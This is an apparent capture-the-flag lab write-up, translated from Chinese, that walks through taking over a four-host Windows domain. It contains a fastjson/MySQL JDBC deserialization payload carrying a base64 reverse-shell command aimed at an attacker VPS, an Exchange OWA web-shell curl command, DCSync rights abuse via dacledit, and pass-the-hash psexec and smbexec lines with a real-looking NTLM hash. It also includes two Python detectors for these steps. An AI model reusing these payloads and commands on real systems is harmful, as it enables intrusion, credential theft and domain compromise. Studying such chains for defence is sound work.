Start with a full port scan.

No exploitable services stood out, so let's look at ports 80 and 8000 instead.

Port 8000 runs Lumia ERP; the weak password admin:123456 logs in.

Once inside, clicking "official plugins" in the top-right corner redirected to 华夏ERP, so I went looking for known 华夏ERP vulnerabilities.

No good authenticated RCE turned up, but a glance at the hint pointed at JDBC, and one search later it was obvious.

Found the reference article.

Spin up a malicious MySQL server on a public host --> https://github.com/fnmsd/MySQL_Fake_Server

config.json (ysoserial-all.jar is from https://github.com/frohoff/ysoserial):

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCA.....zMzIDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

Payload:

{
    "name": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo": "VPS-IP",
        "portToConnectTo": 3306,
        "info": {
            "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAta......zMzIDA+JjE=}|{base64,-d}|{bash,-i}",
            "password": "pass",
            "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize": "true",
            "NUM_HOSTS": "1"
        }
    }
}

Send it straight from Burp; remember to URL-encode it first.
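From the defender's side, the whole chain above hinges on two things the application should never accept from a client: a fastjson "@type" directive and MySQL Connector/J properties such as autoDeserialize and statementInterceptors. The following is an added example (not code from the write-up or from either GitHub project) of a request-body check that a WAF filter, a log pipeline or a unit test can run to flag exactly that pattern. The sample bodies, the placeholder address 203.0.113.10 and the elided command string are constructed for the example.

```python
"""Added example, not part of the original write-up: a request-body check for
the fastjson + MySQL Connector/J deserialization pattern shown above.

It walks a JSON body and reports (1) any "@type" autotype directive, naming
the class when it is a Connector/J or AutoCloseable type, and (2) any
Connector/J property that should never be accepted from a client
(autoDeserialize, statementInterceptors, ...). The sample bodies and the
203.0.113.10 address are constructed for this example.
"""
import json
from urllib.parse import quote, unquote_plus

# Connector/J properties that turn the client into a deserialization sink or
# a file reader when the server side is attacker-controlled.
DANGEROUS_JDBC_PROPS = {
    "autoDeserialize",
    "statementInterceptors",
    "queryInterceptors",
    "allowLoadLocalInfile",
    "allowUrlInLocalInfile",
}

# Class prefixes that mark the JDBC-connection gadget in an @type directive.
SUSPICIOUS_TYPE_PREFIXES = (
    "com.mysql.jdbc.",
    "com.mysql.cj.jdbc.",
    "java.lang.AutoCloseable",
)


def _parse_json(raw):
    """Parse raw or URL-encoded JSON; return None if neither form parses."""
    for candidate in (raw, unquote_plus(raw)):
        try:
            return json.loads(candidate)
        except ValueError:
            continue
    return None


def _walk(node, path=""):
    """Yield (path, key, value) for every key in a nested JSON value."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield path, key, value
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def inspect_body(raw):
    """Return a list of findings for a request body; empty means clean.

    Note: json.loads keeps the last of duplicate keys, so a body with two
    "@type" keys (as in the payload above) is seen with the second one,
    which is the class that actually gets instantiated.
    """
    doc = _parse_json(raw)
    if doc is None:
        return []
    findings = []
    for path, key, value in _walk(doc):
        where = path or "/"
        if key == "@type":
            if isinstance(value, str) and value.startswith(SUSPICIOUS_TYPE_PREFIXES):
                findings.append(f"{where}: @type={value}")
            else:
                findings.append(f"{where}: @type directive ({value!r})")
        elif key in DANGEROUS_JDBC_PROPS:
            findings.append(f"{where}: JDBC property {key}={value!r}")
    return findings


# Constructed samples: the malicious one mirrors the payload above with the
# VPS address replaced by a TEST-NET-3 placeholder and the command elided.
SAMPLE_MALICIOUS = json.dumps({
    "name": {
        "@type": "com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo": "203.0.113.10",
        "portToConnectTo": 3306,
        "info": {
            "user": "yso_CommonsCollections6_<command elided>",
            "password": "pass",
            "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize": "true",
            "NUM_HOSTS": "1",
        },
    }
})
SAMPLE_BENIGN = json.dumps({"name": "alice", "info": {"email": "alice@example.com"}})

if __name__ == "__main__":
    for label, body in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS),
                        ("malicious (url-encoded)", quote(SAMPLE_MALICIOUS))):
        print(label, inspect_body(body))
```

The check is deliberately key-based rather than signature-based: it fires on any "@type" directive, because an application that does not need polymorphic typing should reject it outright (or disable autotype in fastjson), and it treats the listed Connector/J properties as client-supplied data that must never reach a JDBC URL or Properties object.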

Shell obtained, and it's root.

Bring the session into Viper first to make the rest easier, and read the flag while at it.

Check the network interfaces:

eth0      Link encap:Ethernet  HWaddr 00:16:3e:23:0c:59  
          inet addr:172.22.3.12  Bcast:172.22.255.255  Mask:255.255.0.0
          inet6 addr: fe80::216:3eff:fe23:c59/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:450985 errors:0 dropped:0 overruns:0 frame:0
          TX packets:369352 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162374033 (162.3 MB)  TX bytes:32947225 (32.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8148 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8148 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1608086 (1.6 MB)  TX bytes:1608086 (1.6 MB)

Then upload fscan to sweep the C-class range, and set up a proxy through Viper while at it:

shell ./fscan -h 172.22.3.0/24

Results:

meterpreter > shell -c './fscan -h 172.22.3.0/24'

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:22 open
172.22.3.9:8172 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:445 open
172.22.3.26:139 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.9:139 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:135 open
172.22.3.9:81 open
172.22.3.12:8000 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.2:88 open
172.22.3.9:808 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC           
[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393 
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

A quick look: the classic four-machine layout.

172.22.3.12     compromised
172.22.3.9      domain member
172.22.3.2      domain controller
172.22.3.26     domain member

172.22.3.9 has Outlook (OWA) on it; look at that first.

Fire the exploit straight away, guessing the mail domain is xiaorang.lab.

admin@xiaorang.lab didn't work; administrator@xiaorang.lab did.

p4 python3 exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab

The shell was written successfully.

Commands are executed with the following request:

curl --request POST --url https://172.22.3.9/owa/auth/llmuo.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k

Route it through the proxy and it runs: RCE confirmed.

Then generate a PowerShell one-liner with msf to get a session, and read the flag.

Go straight in and dump hashes.

That yields the hash of domain user zhangtong and the hash of the current SYSTEM account.

A quick BloodHound pass shows that the domain user on the Exchange machine has WriteDacl rights, i.e. zhangtong.

Grant that account DCSync rights:

p4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes : -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
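Both halves of this step are visible in the domain controller's Security log if directory-service auditing is on: the DACL write on the domain object is recorded as event 5136 (attribute nTSecurityDescriptor), and every later replication request shows up as event 4662 carrying the DS-Replication-Get-Changes extended-right GUIDs. The following is an added example (not code from the write-up or from impacket) of a detection over such events, already flattened to one JSON object per line as a SIEM pipeline would deliver them. The event lines are constructed for the example; the GUIDs are the well-known ones from the Active Directory schema.

```python
"""Added example, not part of the original write-up: a detection for the two
steps above, a DACL change on the domain object followed by use of the
replication rights (DCSync) by an account that is not a domain controller.

Input is a stream of Security events already flattened to JSON, one per
line, as a SIEM pipeline would deliver them; the lines below are constructed
for this example. Event 5136 records the directory-object modification,
event 4662 the control-access use with the extended-right GUIDs.
"""
import json
import re

# Well-known extended-right GUIDs that together allow directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Get-Changes plus Get-Changes-All is what a DCSync needs to pull secrets.
DCSYNC_MINIMUM = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}")

SAMPLE_EVENTS = """\
{"EventID": 5136, "SubjectUserName": "XIAORANG-EXC01$", "ObjectDN": "DC=xiaorang,DC=lab", "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"}
{"EventID": 4662, "SubjectUserName": "XIAORANG-WIN16$", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "zhangtong", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "zhangtong", "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100"}
{"EventID": 4624, "SubjectUserName": "-", "TargetUserName": "lumia"}
"""


def analyze_events(text, dc_accounts):
    """Return DACL changes on domain objects and non-DC DCSync activity.

    dc_accounts: upper-case machine account names of the domain controllers,
    e.g. {"XIAORANG-WIN16$"}; their replication traffic is expected.
    """
    dacl_changes = []
    rights_used = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        eid = ev.get("EventID")
        if (eid == 5136
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
                and ev.get("ObjectDN", "").upper().startswith("DC=")):
            dacl_changes.append((ev["SubjectUserName"], ev["ObjectDN"]))
        elif eid == 4662:
            subject = ev.get("SubjectUserName", "")
            if subject.upper() in dc_accounts:
                continue
            for guid in GUID_RE.findall(ev.get("Properties", "")):
                name = REPLICATION_RIGHTS.get(guid.lower())
                if name:
                    rights_used.setdefault(subject, set()).add(name)
    dcsync = {s: sorted(r) for s, r in rights_used.items() if DCSYNC_MINIMUM <= r}
    return {"dacl_changes": dacl_changes, "dcsync": dcsync}


if __name__ == "__main__":
    print(json.dumps(analyze_events(SAMPLE_EVENTS, {"XIAORANG-WIN16$"}), indent=2))
```

On the prevention side, the finding that matters is the 5136: a computer account (here the Exchange server, via the WriteDacl that Exchange's legacy permission model grants) rewriting the domain's security descriptor. Removing that WriteDacl from the Exchange groups, or at least alerting on any nTSecurityDescriptor change at the domain root, stops the chain before any hash is replicated.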

Then psexec straight into the DC:

p4 python3 psexec.py administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk

That gives flag4.

One flag left; it should be on the .26 machine.

Move laterally with smbexec:

p4 python3 smbexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -codec gbk

Nothing in admin's directory.

lumia's desktop has a secret.zip; getting fancy now, are we?

The network was about to be cut, so I just consulted the write-up.

The archive turns out to be password-protected. lumia has a few emails hinting that the password is a phone number and listing a batch of phone numbers; brute-forcing those gives flag3.

Win!

Done.